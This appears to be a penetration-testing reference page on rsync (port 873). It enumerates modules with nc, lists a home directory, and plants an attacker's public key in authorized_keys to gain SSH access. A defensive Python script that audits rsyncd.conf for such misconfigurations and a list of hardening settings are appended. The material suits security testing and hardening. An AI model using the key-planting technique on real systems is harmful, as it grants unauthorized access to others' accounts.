rsync (Port 873)

What is rsync?

Rsync is a fast and extraordinarily versatile file copying tool. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon. It offers a large number of options that control every aspect of its behavior and permit very flexible specification of the set of files to be copied. It is famous for its delta-transfer algorithm, which reduces the amount of data sent over the network by sending only the differences between the source files and the existing files in the destination. Rsync is widely used for backups and mirroring and as an improved copy command for everyday use.

nc

Enumerate directory names (when anonymous access is enabled):

$ nc <remote_ip> 873

@RSYNCD: 31.0       <--- You receive this banner with the version from the server
@RSYNCD: 31.0       <--- Then you send the same info
#list               <--- Then you ask the server to list
this_is_a_username  <--- The server starts enumerating
@RSYNCD: EXIT       <--- Server closes the connection

rsync

Enumerate directory content:

$ rsync -av --list-only rsync://<remote_ip>/<user's_home_directory>

receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 09:21:59 .
lrwxrwxrwx              9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 00:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r--            807 2019/04/18 00:12:36 .profile

sent 20 bytes  received 136 bytes  24.00 bytes/sec
total size is 4,562  speedup is 29.24

Upload authorized_keys

If we have access to a user's home directory via rsync, we can upload an authorized_keys file that contains our public key, so that SSH won't ask us for a password.

Generate an RSA key pair:

$ mkdir .ssh
$ cd .ssh
$ ssh-keygen

Prepare authorized_keys and upload the entire .ssh directory to the remote machine:

$ cd .ssh
$ cat id_rsa.pub > authorized_keys
$ cd ..
$ rsync -a --relative ./.ssh rsync://<remote_ip>/<user's_home_directory>/

SSH in:

$ chmod 600 .ssh/id_rsa
$ ssh -i .ssh/id_rsa <username>@<remote_ip>
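
To check a server for the settings this page depends on (a listable module, anonymous access, and write access to a home directory), the following added example, which is not part of the original page, audits an rsyncd.conf. The sample configuration, module names and finding labels are constructed; parameter names and defaults follow rsyncd.conf(5).

```python
import re

# Defaults from rsyncd.conf(5): modules are read-only, listable and anonymous.
DEFAULTS = {"readonly": "yes", "list": "yes", "authusers": "", "hostsallow": ""}
TRUE = {"yes", "true", "1"}

# Constructed sample: one weak module, one hardened module.
SAMPLE_CONF = """\
[homes_alice]
    path = /home/alice
    read only = no
[mirror]
    path = /srv/mirror
    list = no
    auth users = mirror_ro
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
"""

def parse_modules(text):
    """Return {module: params}; parameters before the first [module] are defaults."""
    base, modules, current = dict(DEFAULTS), {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), dict(base))
        elif line and not line.startswith("#") and "=" in line:
            name, value = line.split("=", 1)
            # Whitespace inside parameter names is irrelevant ("read only" == "readonly").
            key = re.sub(r"\s+", "", name).lower()
            (base if current is None else current)[key] = value.strip()
    return modules

def audit(text):
    """Return sorted (module, finding) pairs for settings that allow anonymous abuse."""
    findings = []
    for name, p in parse_modules(text).items():
        if p["list"].lower() in TRUE:
            findings.append((name, "module-listed"))      # name returned by #list
        if not p["authusers"]:
            findings.append((name, "anonymous-access"))   # no password required
            if p["readonly"].lower() not in TRUE:
                findings.append((name, "anonymous-write"))  # e.g. .ssh can be replaced
        if not p["hostsallow"]:
            findings.append((name, "no-hosts-allow"))     # reachable from any address
    return sorted(findings)

if __name__ == "__main__":
    print(*audit(SAMPLE_CONF), sep="\n")
```

Every finding on a module whose path is a home directory should be cleared by setting auth users with a secrets file, read only = yes, list = no and a hosts allow range, as the mirror module in the sample does.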
